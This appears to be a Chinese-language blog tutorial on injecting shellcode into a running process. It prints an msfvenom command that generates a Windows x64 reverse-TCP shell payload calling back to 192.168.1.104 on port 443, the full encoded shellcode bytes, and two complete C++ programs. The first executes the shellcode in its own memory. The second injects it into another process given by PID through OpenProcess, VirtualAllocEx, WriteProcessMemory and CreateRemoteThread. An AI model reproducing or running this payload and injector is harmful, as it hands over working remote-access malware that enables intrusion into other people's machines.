将shellcode注入本地进程

这次我们来学习一下将shellcode注入本地进程内存并切执行的经典方法

首先生成我们的shellcode

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d

 

root@kali:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=50, char=0x61)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 503 (iteration=0)
x64/xor chosen with final size 503
Payload size: 503 bytes
Final size of c file: 2138 bytes
unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33"
"\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0"
"\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1"
"\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07"
"\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0"
"\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec"
"\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93"
"\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99"
"\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a"
"\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0"
"\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7"
"\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e"
"\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1"
"\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13"
"\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e"
"\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13"
"\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a"
"\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5"
"\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a"
"\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7"
"\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9"
"\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4"
"\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7"
"\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b"
"\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56"
"\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85"
"\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a"
"\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac"
"\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7"
"\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90"
"\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96"
"\x65\x4b\x99\x46\xd5\xdb\x11\xd7";

 这里我们用c++注入本地进程

// ConsoleApplication3.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"


#include "stdafx.h"
#include "Windows.h"

int main()
{
	unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33"
"\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0"
"\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1"
"\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07"
"\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0"
"\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec"
"\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93"
"\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99"
"\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a"
"\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0"
"\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7"
"\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e"
"\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1"
"\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13"
"\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e"
"\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13"
"\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a"
"\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5"
"\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a"
"\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7"
"\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9"
"\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4"
"\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7"
"\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b"
"\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56"
"\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85"
"\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a"
"\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac"
"\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7"
"\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90"
"\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96"
"\x65\x4b\x99\x46\xd5\xdb\x11\xd7";

	void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(exec, buf, sizeof buf);
	((void(*)())exec)();

    return 0;
}

 将shellcode注入本地进程

将shellcode注入本地进程

 

 

我们来反汇编一下看看这个shellcode是如何在x64机器上面运行的

将shellcode注入本地进程

 

 下面我们将shellcode注入到指定pid进程

我们构造注入进程c++代码

// ConsoleApplication4.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include "Windows.h"

int main(int argc, char *argv[])
{
    unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33"
"\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0"
"\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1"
"\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07"
"\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0"
"\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec"
"\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93"
"\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99"
"\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a"
"\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0"
"\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7"
"\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e"
"\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1"
"\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13"
"\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e"
"\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13"
"\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a"
"\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5"
"\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a"
"\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7"
"\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9"
"\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4"
"\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7"
"\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b"
"\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56"
"\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85"
"\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a"
"\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac"
"\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7"
"\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90"
"\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96"
"\x65\x4b\x99\x46\xd5\xdb\x11\xd7";

    HANDLE processHandle;
    HANDLE remoteThread;
    PVOID remoteBuffer;

    printf("Injecting to PID: %i", atoi(argv[1]));
    processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
    remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(processHandle, remoteBuffer, buf, sizeof buf, NULL);
    remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    CloseHandle(processHandle);

    return 0;
}

 

将shellcode注入本地进程

 

上一篇:Troubleshooting Why EM Express is not Working (Doc ID 1604062.1)


下一篇:clickhouse知识点